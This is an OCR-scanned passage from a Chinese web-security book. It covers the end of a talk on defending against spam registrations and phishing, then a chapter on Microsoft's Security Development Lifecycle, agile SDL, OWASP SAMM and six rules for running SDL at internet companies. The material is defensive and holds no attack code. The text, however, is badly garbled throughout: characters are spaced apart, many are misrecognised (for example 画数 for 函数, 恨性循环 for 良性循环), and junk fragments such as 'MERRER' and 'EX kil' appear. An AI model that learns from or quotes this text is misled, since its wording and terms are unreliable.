介 、 更 难 抓 到 的 产业 链 ， 这 条 产业 链 也 有 巨大 利 巷 在 育 后 张 使 ， 也 是 
环 环 相 扣 ， 也 有 前 后 层级 关系 ， 但 是 在 现在 的 媒体 中 报道 的 非常 少 。 
垃圾 注册 是 万 恶 之 源 ， 这 条 产业 链 从 垃圾 注册 开始 。 现 在 我 发 现 很 多 
网 站 ， 包 括 大 网 站 的 很 多 邮箱 、 很 多 论坛 应 用 都 存在 着 大 量 垃圾 注册 
用 户 ， 这 些 垃 圾 注册 用 户 对 网 站 目 身 并 不 会 造成 卸 害 ， 但 是 对 整个 互 
联网 会 产生 巨大 的 影响 。 这 些 垃圾 账号 能 够 拿 来 干什么 ?首先 是 做 广 
告 。 点 击 欺诈 、 广 告 苏 诈 ， 很 多 广告 联盟 ， 包 括 百 度 、 雅 席 可 能 都 有 
这 样 一 批 人 在 背后 做 广告 推广 。 其 次 是 发 反动 政治 言论 。 这 些 都 是 二 
圾 账号 发 出 来 的 ， 没 有 人 用 目 己 的 真实 账号 发 ， 很 多 时 候 我 们 在 网 上 
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还 有 束 古 刷 等 级 ， 可 能 存在 一 些 用 户 行 为 ， 可 以 把 低 等 级 会 员 刷 成 融 
等 级 会 员 。 还 有 领 红 包 ， 我 们 给 团队 一 些 推广 费用 ， 和 希望 给 用 户 回 
报 ， 但 是 没有 一 个 有 效 措施 保障 这 些 回 报 落 到 有 效 客户 手 里 ， 大 部 分 
推广 费用 落 到 了 垃圾 注册 的 口袋 ， 最 终 可 能 只 有 一 个 团伙 在 收 钱 。 
男 外 垃圾 流量 也 会 消耗 大 量 的 流量 和 资产， 侧面 反映 束 古 我 们 的 经 
费 、 我 们 的 钱 、 我 们 的 服务 器 ， 每 年 会 消耗 成 本 ， 如 果 能 够 控制 垃圾 
注册 ， 也 就 能 够 降低 我 们 的 维护 成 本 。 我 们 是 如 何 成 为 清洁 工 的 ? 现 
在 的 垃圾 注册 大 部 分 是 由 机 器 人 在 发 ， 我 们 要 做 的 事情 束 古 人 机 识 
别 。 想 到 人 机 识别 〈 束 是 识别 人 和 机 器 ) ， 大 家 的 第 一 反应 就 是 验证 


码 ， 如 果 有 一 个 好 的 验证 码 ， 确 实 能 够 很 快 识 别 出 是 人 还 是 机 需 ; 但 
是 验证 码 有 验证 码 的 问题 ， 很 多 时 候 出 于 用 户 体验 等 因素 的 考虑 不 能 
使 用 验证 码 。 所 以 我 们 有 一 套 专门 的 解决 方案 ， 通 过 用 户 行为 分 析 ， 
判断 到 底 是 人 还 是 机 器 ， 这 套 系 统 的 准确 率 已 经 达到 99.999% ， 在 10 
万 个 分 析 里 面 有 一 个 误 报 ， 这 是 我 们 目前 的 现状 。 

我 们 通过 分 析 这 个 人 发 消息 的 一 些 频 率 ， 包 括 他 的 来 源 是 不 是 代理 
了 PP， 我 们 建立 了 很 大 的 代理 IP 库 ， 抓 全 国 、 全 世界 代理 卫 ， 判 断 消 妨 
来 源 是 否 可 信 ; 我 们 在 后 端 还 会 有 一 些 规 则 分 析 用 户 行 为 到 底 是 不 是 
一 个 正常 用 户 行为 ， 从 而 判断 出 这 是 不 是 一 个 垃圾 注册 。 通 过 我 们 的 
努力 ， 在 前 段 时 间 ， 垃 圾 注册 量 有 一 个 下 降 ， 这 个 具体 数据 比较 敏 
感 ， 不 能 放 在 这 儿 ， 红 色 的 是 正常 用 户 ， 蓝 色 的 是 垃圾 注册 ， 我 们 发 
现 有 一 个 明显 下 降 。 这 个 效果 是 非常 明显 的 ， 这 样 网 站 的 业务 干净 
了 ， 也 就 安全 了 很 多 ， 包 括 诈骗 、 钓 鱼 风险 小 了 很 多 ， 更 不 会 有 人 上 
来 发 反动 言论 。 垃 圾 注册 是 万 亚 之 源 ， 是 这 条 产业 链 的 所 有 源头 。 


钓鱼 在 金融 行业 是 重 灾 区 ， 这 个 图 显示 有 80% 的 钓鱼 是 针对 金融 行业 
的 ， 钓鱼 目标 包括 所 有 的 提供 支付 的 商家 ， 也 包括 想 要 在 金融 平台 提 
供 服 务 的 网 站 ， 这 和 中 小 站 长 有 着 密切 的 关系 ， 如 果 你 想 给 用 户 提 供 
在 线 支 付 业 务 ， 就 有 可 能 成 为 钓鱼 网 站 的 日 标 。 钓 鱼网 站 我 们 是 怎么 
解决 的 ? 这 个 图 是 中 国 反 钓鱼 联盟 (下 属于 CNNIC 的 一 个 机 构 ) HE 
的 一 个 报表 ， 在 10 月 份 淘宝 钓鱼 网 站 有 2400 多 个 ， 数 据 全 是 我 们 提供 
给 他 们 的 ， 在 我 看 来 ， 这 个 报表 并 不 能 说 淘宝 的 钓鱼 网 站 数 最 多 ， 而 
是 因为 我 们 检测 能 力 最 强 ， 强 到 什么 程度 ， 第 一 个 数字 5000 万 ， 我 们 
现在 每 天 检查 5000 万 个 URL，5 秒 之 内 如 果 有 新 的 钓鱼 网 站 出 现 ， 就 会 
被 我 们 的 系统 捕捉 。 我 们 现在 把 钓鱼 网 站 运营 成 本 和 周期 ， 从 最 开始 
的 1 周 压缩 到 1 天 ， 现 在 正在 向 1 分 钟 迈进 ， 也 就 是 说 ， 一 个 钓鱼 网 站 以 
前 能 用 1 周 ， 现 在 只 能 用 1 天 了 ， 用 1 天 之 后 ， 这 个 网 站 马上 失效 ， 会 在 
杀毒 软件 里 失效 ，IDC 机 房 会 把 服务 器 下 线 ， 域 名 也 会 关 掉 ， 我 们 正 
ye 

我 的 职责 就 是 终结 麻烦 ， 中 小 网 站 面临 着 各 种 各 样 的 安全 问题 ， 面 临 
着 各 种 各 样 的 麻烦 网 站 被 DDOS， 网 站 被 入 侵 ， 数 据 被 偷 走 ， 网 
站 被 挂 马 ， 杀 毒 软件 报警 ， 网 站 里 垃圾 消息 满天飞 。 我 们 会 尽 全 力 解 
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化 ? 我 们 最 开始 做 安全 时 ， 也 考虑 过 购买 安全 厂商 的 服务 和 产品 ， 但 
是 后 来 发 现 这 些 商 用 的 安全 服务 和 产品 并 不 能 跟 上 互联 网 的 节 委 ， 并 
不 能 为 我 们 的 需求 实施 定制 化 解决 方案 ， 我们 最 终 选 择 目 己 来 做 。 我 
刚才 讲 的 所 有 东西 都 是 我 们 自己 做 的 ， 每 一 行 代码 都 是 我 们 自己 写 
的 ， 这 就 是 我 们 的 安全 之 路 。 今 天 束 介 绍 这 些 ， 谢 谢 大 家 。 


第 17 章 ”安全 开发 流程 (SDL) 

安全 开发 流程 ， 能 够 帮助 企业 以 最 小 的 成 本 提高 产品 的 安全 性 。 它 符 
A “Secure at theSource” 的 战略 思想 。 实 施 好 安全 开发 流程 ， 对 企业 安 
全 的 发 展 来 说 ， 可 以 起 到 事半功倍 的 效果 。 


171 SDL 简 介 

SDL 的 全 称 是 Security Development Lifecy-cle， 即 : 安全 开发 生命 周 
期 。 它 是 由 微软 最 早 提出 的 ， 在 软件 工程 中 实施 ， 是 帮助 解决 软件 安 
全 问题 的 办 法 。SDL 是 一 个 安全 保证 的 过 程 ， 其 重点 是 软件 开发 ， 它 
在 开发 的 所 有 阶段 都 引入 了 安全 和 隐私 的 原则 。 目 2004 年 起 ，SDL 一 
直 都 是 微软 在 全 公司 实施 的 强制 性 沫 略 。SDL 的 大 致 步 又 如 下 : 


培训 EX kil 实施 验证 Ai 响应 
MERRER 。 确定 设计 要 求 使 用 批准 的 工具 HSA 。 事件 啊 应 计划 
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SDL 中 的 方法 ， 试 图 从 安全 漏洞 产生 的 根源 上 解决 问题 。 通 过 对 软件 
工程 的 控制 ， 保 证 产品 的 安全 性 。 

SDL 对 于 漏洞 数量 的 减少 有 着 积极 的 意义 。 根 据 美 国 国家 漏洞 数据 库 
的 数据 显示 ， 每 年 发 现 的 漏洞 趋势 有 以 下 特点 : 每 年 有 数 千 个 漏洞 被 
发 现 ， 其 中 大 多 数 漏洞 的 危害 程度 高 ， 而 复杂 性 却 反 而 较 低 ; 这些 漏 
洞 多 出 现 于 应 用 程序 中 ， 易 于 被 利用 的 漏洞 占 了 大 多 数 。 

而 美国 国家 标准 与 技术 研究 所 (NIST) 估计 ， 如 果 是 在 项 目 发 布 后 再 
执行 漏洞 修复 计划 ， 其 修复 成 本 相当 于 在 设计 阶段 执行 修复 的 30 倍 。 
For-rester Research, Inc. 和 Aberdeen Group 研究 发 现 ， 如 果 公 司 采 用 像 
Microsoft SDL 这 样 的 结构 化 过 程 ， 就 可 以 在 相应 的 开发 阶段 系统 地 处 
理 软 件 安全 问题 ， 因 此 更 有 可 能 在 项 目 早期 发 现 并 修复 漏洞 ， 从 而 降 
低 软 件 开发 的 总 成 本 。 

微软 历来 都 是 黑客 攻击 的 重点 ， 其 客户 深 受 安全 问题 的 困扰 。 在 外 部 
环境 不 断 恶 化 的 情况 下 ， 比 尔 - 盖 次 在 2002 年 1 月 发 布 了 他 的 可 信任 计算 
备忘录 。 可 信任 计算 的 启动 从 根本 上 改变 了 公司 对 于 软件 安全 的 优先 
级 。 来 自 高 级 管理 层 的 这 项 命令 将 安全 定位 为 Microsoft 最 应 优先 考虑 
的 事情 ， 为 实现 持续 稳定 的 工程 文化 变革 活动 提供 了 所 需 的 动力 。 而 
SDL 束 是 可 信任 计算 的 重要 组 成 部 分 。 


MERE LEE, GUEXBJSDLIEREAKSUJOS1e BER (优化 后 ) 。 
阶段 1: 培训 

开发 团队 的 所 有 成 员 都 必须 接受 适当 的 安全 培训 ， 了 解 相关 的 安全 知 
识 。 培 训 的 环节 在 SDL 中 看 似 简 单 ， 但 其 实 不 可 或 瑞 。 通 过 培训 能 员 
彻 安全 策略 和 安全 知识 ， 并 在 之 后 的 执行 过 程 中 提高 执行 效率 ， 降 低 
沟通 成 本 o 培训 对 象 包括 开发 人 员 、 测 试 人 员 、 项 目 经 理 、 产 品 经 理 


微软 推荐 的 培训 ， 会 覆盖 安全 设计 、 威 胁 建 模 、 安 全 编码 、 安 全 测 
试 、 隐 私 等 方面 知识 。 

阶段 2， 安 全 要 求 

在 项 目 确立 之 前 ， 需 要 提前 与 项 目 经 理 或 者 产品 owner 进 行 沟通 ， 人 确定 
安全 的 要 求 和 需要 做 的 事情 。 确 认 项 目 计 划 和 里 程 碑 ， 尽 量 避 人 免 因 为 
ee 目 延 期 发 布 一 一 这 是 任何 项 目 经 理 都 讨厌 发 生 的 事 
情 。 

阶段 3: 质量 | 门 /bug 栏 

质量 门 和 bug 栏 用 于 确定 安全 和 隐私 质量 的 最 低 可 接受 级 别 。 在 项 目 开 
始 时 定义 这 些 标准 可 加 强 对 安全 问题 相关 风险 的 理解 ， 并 有 助 于 团队 
在 开发 过 程 中 发 现 和 修复 安全 bug。 项 目 团队 必须 协商 确定 每 个 开发 阶 
段 的 质量 门 〈《 例 如， 必须 在 checkin 代 码 之 前 进行 review 并 修复 所 有 的 编 
译 器 警告 ) ， 随 后 将 质量 门 交 由 安全 顾问 审批 ， 安 全 顾问 可 以 根据 需 
要 添加 特定 于 项 目的 说 明 ， 以 及 更 加 严格 的 安全 要 求 。 另 外 ， 项 目 
队 需 前 明 其 对 安全 门 的 遵从 性 ， 以 便 完 成 最 终 安 全 评析 (FSR) 。 

bug 栏 是 应 用 于 整个 软件 开发 项 目的 质量 门 ， 用 于 定义 安全 漏洞 的 严重 
性 疹 值 。 例 如 ， 应 用 程序 在 发 布 时 不 得 包含 具有 “关键 ?或 “重要 ?评级 的 
已 知 漏洞 。bug 栏 一 经 设 定 ， 便 绝 不 能 放松 。 

阶段 4， 安全 和 隐私 风险 评估 

安全 风险 评估 (SRA) 和 隐私 风险 评估 (PRA) 是 一 个 必需 的 过 程 ， 
用 于 确定 软件 中 需要 深入 评析 的 功能 环 广 e 这些 评 佑 必须 包括 以 下 信 


(1) (ZE) 项 目的 哪些 部 分 在 发 布 前 需要 威胁 模型 ? 

(2) (KE) 项 目的 哪些 部 分 在 发 布 前 需要 进行 安全 设计 评析 ? 

(3) (ZE) 项 目的 哪些 部 分 (如 果 有 ) 需要 由 不 属于 项 目 团队 且 双 
方 认可 的 小 组 进行 渗透 测试 ? 


(4) “(安全 ) 是 否 存 在 安全 顾问 认为 有 必要 增加 的 测试 或 分 析 要 求 以 


(5) 《安全 ) 模糊 测试 要 求 的 具体 范围 是 什么 ? 

(6) (BARA) 隐私 影响 评级 如 何 ? 

阶段 5:， 设 计 要 求 

在 设计 阶段 应 仔细 考虑 安全 和 隐私 问题 ， 在 项 目 初 期 确定 好 安全 需 
求 ， 尽 可 能 避免 安全 引起 的 需求 变更 。 

阶段 6: 减 小 攻击 面 

诚 小 攻击 面 与 威胁 建 模 紧密 相关 ， 不 过 它 解决 安全 问题 的 角度 稍 有 不 
同 。 减 小 攻击 面 通过 减少 攻击 者 利用 潜在 弱点 或 漏洞 的 机 会 来 降低 风 
险 。 减 小 攻击 面包 括 关 闭 或 限制 对 系统 服务 的 访问 ， 应 用 “最 小 权限 原 
则 ”， 以 及 尽 可 能 地 进行 分 层 防 御 。 

阶段 7: 威胁 建 模 

为 项 目 或 产品 面临 的 威胁 建立 模型 ， 明 确 可 能 来 自 的 攻击 有 哪些 方 
m 。 微软 提出 了 STRIDE 模 型 以 帮助 建立 威胁 模型 ， 这 是 非常 好 的 做 
法 

阶段 8: 使 用 指定 的 工具 

开发 团队 使 用 的 编译 器 、 链 接 器 等 相关 工具 ， 可 能 会 涉及 一 些 安全 相 
人 
X e 

阶段 9: 弃 用 不 安全 的 函数 

许多 常用 函数 可 能 存在 安全 隐患 ， 应 该 禁用 不 安全 的 函数 或 API， 使 用 
安全 团队 推荐 的 函数 。 

阶段 10: 静态 分 析 

代码 静态 分 析 可 以 由 相关 工具 辅助 完成 ， 其 结果 与 人 工分 析 相 结合 。 
阶段 11: 动态 程序 分 析 

动态 分 析 是 静态 分 析 的 补充 ， 用 于 测试 环 忆 验证 程序 的 安全 性 。 
阶段 12: 模糊 测试 (Fuzzing Test) 

模糊 测试 是 一 种 专门 形式 的 动态 分 析 ， 它 通过 故意 回应 用 程序 引入 不 
展 格式 或 随机 数据 诱发 程序 故障 。 模 糊 测 试 策略 的 制定 ， 以 应 用 程序 
的 预期 用 途 ， 以 及 应 用 程序 的 功能 和 设计 规范 为 基础 。 安 全 顾问 可 能 
nn 
间 。 


阶段 13: 威胁 模型 和 攻击 面 评析 


项 目 经 常会 因为 需求 变更 等 因素 导致 最 终 的 产 出 偏离 原本 设 定 的 目 
标 ， 因 此 在 项 目 后 期 重新 对 威胁 模型 和 攻击 面 进行 评析 是 有 必要 的 ， 
能 够 及 时 发 现 问 题 并 修正 。 

阶段 14: 事件 啊 应 计划 

受 SDL 要 求 约束 的 每 个 软件 在 发 布 时 都 必须 包含 事件 啊 应 计划 。 即 使 
在 发 布 时 不 包含 任何 已 知 漏洞 的 产品 ， 也 可 能 在 日 后 面临 新 出 现 的 威 
胁 。 需 要 注意 的 是 ， 如 果 产 品 中 包含 第 三 方 的 代码 ， 也 需要 留 下 第 三 
TM 方式 并 加 入 事件 啊 应 计划 ， 以 便 在 发 生 问 题 时 能 够 找到 对 应 


阶段 15: 最 终 安 全 评析 
最 终 安全 评析 (FSR) 是 在 发 布 之 前 仔细 检查 对 软件 执行 的 所 有 安全 活 
动 。 通 过 FSR 将 得 出 以 下 三 种 不 同 结 果 。 


° Pa 。 在 FSR 过 程 中 确定 的 所 有 安全 和 隐私 问题 都 已 得 到 修复 
或 缓解 。 

通过 FSR 但 有 异常 。 在 FSR 过 程 中 确定 的 所 有 安全 和 隐私 问题 都 已 
得 到 修复 或 缓解 ， 并 且 / 或 者 所 有 异常 都 已 得 到 圆满 解决 。 无 法 解 
决 的 问题 将 记录 下 来 ， 在 下 次 发 布 时 更 正 。 

需 上 报 问 题 的 FSR。 如 果 团 队 未 满足 所 有 SDL 要 求 ， 并 且 安 全 顾问 
和 产品 团队 无 法 达成 可 接受 的 折 中 ， 则 安全 顾问 不 能 批准 项 目 ， 
项 目 不 能 发 布 。 团 队 必 须 在 发 布 之 前 解决 所 有 可 以 解决 的 问题 ， 
或 者 上 报 高 级 管理 层 进行 抉择 。 


阶段 16: 发 布 /存档 
在 通过 FSR 或 者 虽 有 问题 但 达成 一 致 后 ， 可 以 完成 产品 的 发 布 。 但 发 布 
和 为 紧急 响应 和 产品 升级 提供 


从 以 上 的 过 程 可 以 看 出 ， 微 软 的 SDL 过 程 实施 非常 细致 。 微 软 这 些 年 
来 也 一 直 帮 助 公司 的 所 有 产品 团队 ， 以 及 合作 伙伴 实施 SDL， 效 果 相 
当 显 著 。 在 微软 实施 了 SDL 的 产品 中 ,被 发 现 的 漏洞 数量 大 大 减少 ， 
漏洞 利用 的 难度 也 有 所 提高 。 

相对 于 微软 的 SDL，OWASP 推 出 了 SAMM (Software Assurance 
MaturityModel) ， 帮 助 开发 者 在 软件 工程 的 过 程 中 实施 安全 。 


SAMM Overview Software 
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SAMM 框 架 图 

SAMM 和 微软 SDL 的 主要 区 别 在 于 ，SDL 适 用 于 软件 开发 商 ， 他 们 以 贩 
售 软件 为 主要 业务 ; 而 SAMM 更 适用 于 目 主 开发 软件 的 使 用 者 ， 如 银 
行 或 在 线 服务 提供 商 。 软 件 开 发 商 的 软件 工程 往往 较为 成 熟 ， 有 着 严 
格 的 质量 控制 ， 而 自主 开发 软件 的 企业 组 织 ， 则 更 强调 高 效 ， 因 此 在 
软件 工程 的 做 法 上 也 存在 差异 。 


17.2 ”敏捷 SDL 

就 微软 的 SDL 过 程 来 看 ， 仍 然 显 得 较为 厚重 。 它 适用 于 采用 瀑布 法 进 
行 开发 的 软件 开发 团队 ， 而 对 于 使 用 敏捷 开发 的 团队 ， 则 难以 适应 。 
敏捷 开发 往往 是 采用 “小 步 快 跑 ”* 的 方式 ， 不断 地 完善 产品 ， 并 没有 非 
常规 范 的 流程 ， 文 档 也 尽 可 能 简单。 这 样 做 有 利于 产品 的 快速 发 布 ， 
但 是 对 于 安全 来 说 ， 往 往 是 一 场 灾 难 。 需 求 无 法 在 一 开始 非常 明确 ， 
一 些 安全 设计 可 能 也 会 随 之 变化 。 

微软 为 敏捷 开发 专门 设计 了 敏捷 SDL 。 
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敏捷 SDL 的 思想 其 实 就 是 以 变化 的 观点 实施 安全 的 工作 。 需 求 和 功能 
可 能 一 直 在 变化 ， 代 码 可 能 也 在 发 生变 化 ， 这 要 求 在 实施 SDL 时 需要 
在 每 个 阶段 更 新 威胁 模型 和 隐私 策略 ， 在 必要 的 环节 和 泛 代 模 糊 测试 、 
代码 安全 分 析 等 工作 。 


17.3 SDL 
对 于 互联 网 公司 来 说 ， 更 倾向 于 使 用 敏捷 开发 ， 快 速 迭代 开发 出 产 
品 。 因 此 微软 的 SDL 从 各 方面 来 看 ， 都 显得 较为 厚重 ， 需 要 经 过 一 些 
定制 和 裁剪 才能 适用 于 各 种 不 同 的 环境 。 
这 些 年 来 ， 笔 者 根据 在 公司 实施 SDL 的 经 验 ， 总 结 出 以 下 几 条 谁 则 。 
准则 一 : 与 项 目 经 理 进 行 充 分 沟通 ， 排 出 足够 的 时 间 。 
一 个 项 目的 安全 评估 ， 在 开发 的 不 同 环节 有 着 不 同 的 安全 要 求 ， 而 这 
些 安全 要 求 都 需要 占用 开发 团队 的 时 间 。 因 此 在 立项 阶段 与 项 目 经 理 
进行 充分 沟通 是 非常 有 必要 的 。 
明确 在 什么 阶段 安全 工程 师 需要 介入 ， 需 要 多 程 ，SDL 就 有 可 能 在 这 
一 阶段 覆盖 到 公司 的 所 有 项 目 。 相 对 于 测试 阶段 和 发 布 阶段 来 说 ， 在 
立项 阶段 就 有 安全 团队 介入 ， 留 给 开发 团队 的 反应 时 间 也 更 加 富足 。 
预 留 出 必要 的 时 间 ， 对 于 项 目的 时 间 管 理 也 具有 积极 意义 。 否 则 很 容 
易 出 现 项 目 快 发 布 了 ， 安 全 团队 突然 说 还 没有 实施 安全 检查 的 情况 。 
这 种 情况 只 能 导致 丙种 结果 : 一 是 项 目 因为 安全 检查 而 延期 发 布 ， 开 
发 团队 、 测 试 团 队 的 所 有 人 都 一 起 重新 做 安全 检查 ; 二 是 项 目 顶 着 安 
全 风险 发 布 ， 之 后 再 重新 建 个 小 项 目 专门 修补 安全 问题 ， 而 在 这 段 时 
间 内 产品 只 能 处 于 “裸奔 ”状态 。 
这 两 种 结果 都 是 非常 糟糕 的 ， 因 此 为 了 避免 这 种 情况 的 发 生 ， 在 立项 
初期 就 应 该 与 项 目 经 理 进 行 充 分 沟通 ， 留 出 足够 多 的 时 间 给 安全 检 
查 。 这 是 SDL 实 施 成 功 的 基础 。 
准则 二 : 规范 公司 的 立项 流程 ， 确 保 所 有 项 目 都 能 通知 到 安全 团队 ， 
避免 遗漏 。 
如 果 根 据 以 往 发 生 的 安全 事件 ， 回 过 头 来 看 安全 问题 是 如 何 产生 的 ， 
则 往往 会 发 现 这 样 一 个 现象 ， 安 全 事件 产生 的 原因 并 不 复杂 ， 但 总 是 
发 生 在 大 家 疏忽 的 一 些 地 方 。 
在 实施 SDL 的 过 程 中 ， 技 术 方案 的 好 坏 往 往 不 是 最 关键 的 ， 最 糟糕 的 
事情 是 SDL 并 没有 覆盖 到 公司 的 全 部 项 目 ， 乃 至 一 些 边 边 角 角 的 小 项 
目 发 布 后 ， 安 全 团队 都 不 知道 ， 最 后 导致 安全 事件 的 发 生 。 
如 何 才能 保证 公司 的 所 有 项 目 都 能 够 及 时 通知 到 安全 团队 呢 ? 在 公司 
规模 较 小 时 ， 员 工 沟 通 成 本 较 低 ， 很 容易 做 到 这 件 事 情 。 但 当 公 司 大 
到 一 定 的 规模 时 ， 出 现 多 个 部 门 与 多 个 项 目 组 ， 沟 通 成 本 就 大 大 增 
人 
常 有 必 o 


前 文 提 到 ，SDL 是 依托 于 软件 工程 的 ， 立 项 也 属于 软件 工程 的 一 部 
分 。 如 果 能 集中 管理 立项 过 程 ，SDL 就 有 可 能 在 这 一 阶段 覆盖 到 公司 
的 所 有 项 目 。 相 对 于 测试 阶段 和 发 布 阶段 来 说 ， 在 立项 阶段 就 有 安全 
团队 介入 ， 留 给 开发 团队 的 反应 时 间 也 更 加 富足 。 

准则 三 。 树 立 安全 部 门 的 权威 ， 项 目 必须 由 安全 部 门 审核 完成 后 才能 


在 实施 SDL 的 过 程 中 ， 除 了 教育 项 目 组 成 员 (如 项 目 经 理 、 产 品 经 
理 、 开 发 人 员 、 测 试 人 员 等 ) 实施 安全 的 好 处 外 ， 安 全 部 门 还 需要 树 
立 一 定 的 权威 。 

必须 通过 规范 和 制度 ， 明 确 要 求 所 有 项 目 必须 在 安全 审核 完成 后 才能 
发 布 。 如 果 没有 这 样 的 权威 ， 对 于 项 目 组 来 说 ， 安 全 就 变 成 了 一 项 可 
有 可 无 的 东西 。 而 如 果 产 品 急 着 发 布 ， 很 可 能 因此 砍 掉 或 者 裁减 部 分 
安全 需求 ， 也 可 能 延期 修补 漏洞 ， 从 而 导致 风险 升 高 。 

这 种 权威 的 树立 ， 在 公司 里 需要 从 上 往 下 推动 ， 由 技术 总 负责 人 或 者 
产品 总 负责 人 确认 ， 安 全 部 门 实施 。 在 具体 实施 时 ， 可 以 依据 公司 的 
不 同情 况 在 相应 的 流程 中 明确 。 比 如 负责 产品 的 质量 保障 部 门 ， 或 者 
负责 产品 发 布 的 运 维 部 门 ， 都 可 以 成 为 制度 的 执行 者 。 

当然 ，“ 项 目 必须 由 安全 部 门 审核 完成 后 才能 发 布 "， 这 句 话 并 非 绝 
对 ， 其 背后 的 含义 是 为 了 树立 安全 部 门 的 权威 。 因 此 在 实际 实施 SDL 
的 过 程 中 ， 安 全 也 可 能 对 业务 妥协 。 比 如 对 于 不 是 非常 严重 的 问题 ， 
在 业务 时 间 压力 非常 大 的 情况 下 ， 可 以 考虑 事后 再 进行 修补 ， 或 者 使 
用 临时 方案 应 对 紧急 状况 。 安 全 最 终 是 需要 为 业务 服务 的 。 

准则 四 ， 将 技术 方案 写 入 开发 、 测 试 的 工作 手册 中 。 

对 于 开发 、 测 试 团队 来 说 ， 对 其 工作 最 有 效 的 约束 方式 就 是 工作 手 
册 。 对 于 开发 来 说 ， 这 个 手册 可 能 是 开发 规范 。 开 发 规范 涉及 的 方面 
比较 广 ， 比 如 画 数 名 的 大 小 写 方式 、 注 释 的 写法 等 都 会 涵盖 。 笔 者 观 
察 过 很 多 开发 团队 的 规范 ， 其 内 容 鲜 有 涉及 安全 的 ， 少 量 有 安全 规范 
的 ， 其 内 容 也 存在 各 种 各 样 的 问题 。 

因此 ， 与 其 事后 通过 代码 审核 的 方式 告知 开发 者 代码 存在 漏洞 ， 需 要 
修补 ， 倒 不 如 直接 将 安全 技术 方案 写 入 开发 者 的 代码 规范 中 。 比 如 规 
定好 哪些 画 数 是 要 求 禁 用 的 ， 只 能 使 用 哪些 画 数 ， 或 者 封装 好 一 些 安 
全 功能 ， 在 代码 规范 中 注 明 在 什么 情况 下 使 用 什么 样 的 安全 API 。 

对 于 程序 员 们 来 说 ， 记 住 代码 规范 中 的 要 求 ， 远 比 记 住 复杂 的 安全 原 
理 要 容易 得 多 。 一 般 来 说 ， 程 序 员 们 只 需要 记 住 如 何 使 用 安全 功能 就 
行 ， 而 不 必 深 究 其 原理 。 


对 于 测试 人 员 的 要 求 是 类 似 的 。 在 测试 的 工作 手册 中 ， 可 以 加 入 安全 
测试 的 方法 ， 清 楚 地 列 出 每 一 个 测试 用 例 ， 第 一 步 、 第 二 步 做 什么 。 
这 样 一 些 基础 的 安全 测试 就 可 以 交 由 测试 人 员 完 成 ， 最 后 生成 一 份 安 
全 测试 报告 即 可 。 

准则 五 ， 给 工程 师 培训 安全 方案 。 

在 微软 的 SDL 框 架 中 ， 第 一 项 就 是 培训 。 培 训 的 作用 不 可 小 视 ， 它 是 
技术 方案 与 执行 者 之 间 的 调和 剂 。 

在 “ 谁 则 四 ”中 提 到 ， 需 要 将 安全 技术 方案 最 大 程度 地 写 入 代码 规范 等 
工作 手册 中 ， 但 同时 让 开发 者 有 机 会 了 解 安全 方案 的 背景 也 是 很 有 意 
义 的 事情 。 通 过 培训 可 以 达到 这 个 目的 © 

培训 最 重要 的 作用 是 ， 在 项 目 开 发 之 前 ， 能 够 使 开发 者 知道 如 何 写 出 
安全 的 代码 ， 从 而 节约 开发 成 本 。 因 为 如 果 开 发 者 未 经 培训 ， 可 能 在 
代码 审核 阶段 会 被 找 出 非常 多 的 安全 bug， 修 复 每 一 个 安全 bug 都 将 消 
耗 额 外 的 开发 时 间 ; 同时 开发 者 知 不 能 理解 这 些 安全 问题 ， 由 安全 工 
程 师 对 每 个 问题 进行 解释 与 说 明 ， 也 是 一 份额 外 的 时 间 文 出 。 

因此 在 培训 阶段 贯彻 代码 规范 中 的 安全 需求 ， 可 以 极 大 地 节约 开发 时 
间 ， 对 整个 项 目 组 都 有 着 积极 的 意义 ， 并 不 是 可 有 可 无 的 事情 。 
准则 六 : 记录 所 有 的 安全 bug， 激 励 程 序 员 编 写 安 全 的 代码 o 

为 了 更 好 地 推动 项 目 组 写 出 安全 的 代码 ， 可 以 尝试 给 每 个 开发 团队 设 
立 绩效 。 被 发 现 漏洞 最 少 的 团队 可 以 得 到 奖励 ， 并 将 结果 公布 出 来 。 
如 此 ,项目 组 之 间 将 产生 一 些 竞争 的 氛围 ， 开 发 者 们 将 更 努力 于 遵守 
安全 规范 ， 写 出 安全 的 代码 。 此 举 还 能 帮助 不 断 提高 开发 者 的 代码 质 
量 ， 形 成 恨 性 循环 。 

以 上 这 六 条 准则 ， 是 笔者 在 互联 网 公司 中 实施 SDL 的 一 些 经 验 与 心 
得 。 互 联网 公司 对 产品 、 用 户 体验 的 重视 程度 非常 高 ， 大 多 数 的 产品 
都 要 求 在 短 时 间 内 发 布 ， 因 此 在 SDL 的 实施 上 有 着 自己 的 特色 。 

在 互联 网 公司 ， 产 品 开发 生命 周期 大 致 可 以 划分 为 需求 分 析 阶 段 、 设 
计 阶 段 、 开 发 阶段 、 测 试 阶 段 。 下 面 将 就 这 几 个 不 同 的 阶段 ， 介 绍 一 
些 常 用 的 SDL 实 施 方 法 和 工具 。 


17.4 ”需求 分 析 与 设计 阶段 

需求 分 析 阶 段 与 设计 阶段 是 项 目的 初始 阶段 。 需 求 分 析 阶 段 将 论证 项 
目的 目标 、 可 行 性 、 实 现 方向 等 问题 。 

在 需求 阶段 ， 安 全 工程 师 需要 关心 产品 主要 功能 上 的 安全 强度 和 安全 
体验 是 否 足 够 ， 主 要 和 需要 思考 安全 功能 。 比 如 需要 给 产品 设计 一 个 “用 
户 密码 取 回 * 功 能， 那么 是 通过 手机 短信 的 方式 取 回 ， 还 是 邮箱 取 回 ? 
很 多 时 候 ， 需 要 从 产品 发 展 的 大 方向 上 考虑 问题 。 

需要 注意 的 是 ， 在 安全 领域 中 , “安全 功能 ”与 “安全 的 功能 ”是 两 个 不 
同 的 概念 。“ 安 全 功能 ”是 指 产 品 本 里 提供 给 用 户 的 安全 功能 ， 比 如 数 
字 证 书 、 密 码 取 回 问题 等 功能 。 

而 “安全 的 功能 ”>， 则 指 在 产品 具体 功能 的 实现 上 要 做 到 安全 ， 不 要 出 
现 漏洞 而 被 黑客 利用 。 

比如 在 “用 户 取 回 密码 ?时 常用 到 的 功能 : 安全 问题 ， 这 个 功能 是 一 个 
但 若是 在 代码 实现 上 存在 漏洞 ， 则 可 能 成 为 一 个 不 安全 的 
功能 。 

在 需求 分 析 阶 段 ， 可 以 对 项 目 经 理 、 产 品 经 理 或 架构 师 进 行 访谈 ， 以 
了 解 产 品 衣 景 和 技术 以 构 ， 并 给 出 相应 的 建议 。 从 以 往 的 经 验 来 看 ， 
一 份 checklist 可 以 在 一 定 程度 上 帮助 到 我 们 。 下 面 是 安全 专家 Lenny 
Zeltser 给 出 的 一 份 checklist， 可 以 用 于 参考 。 

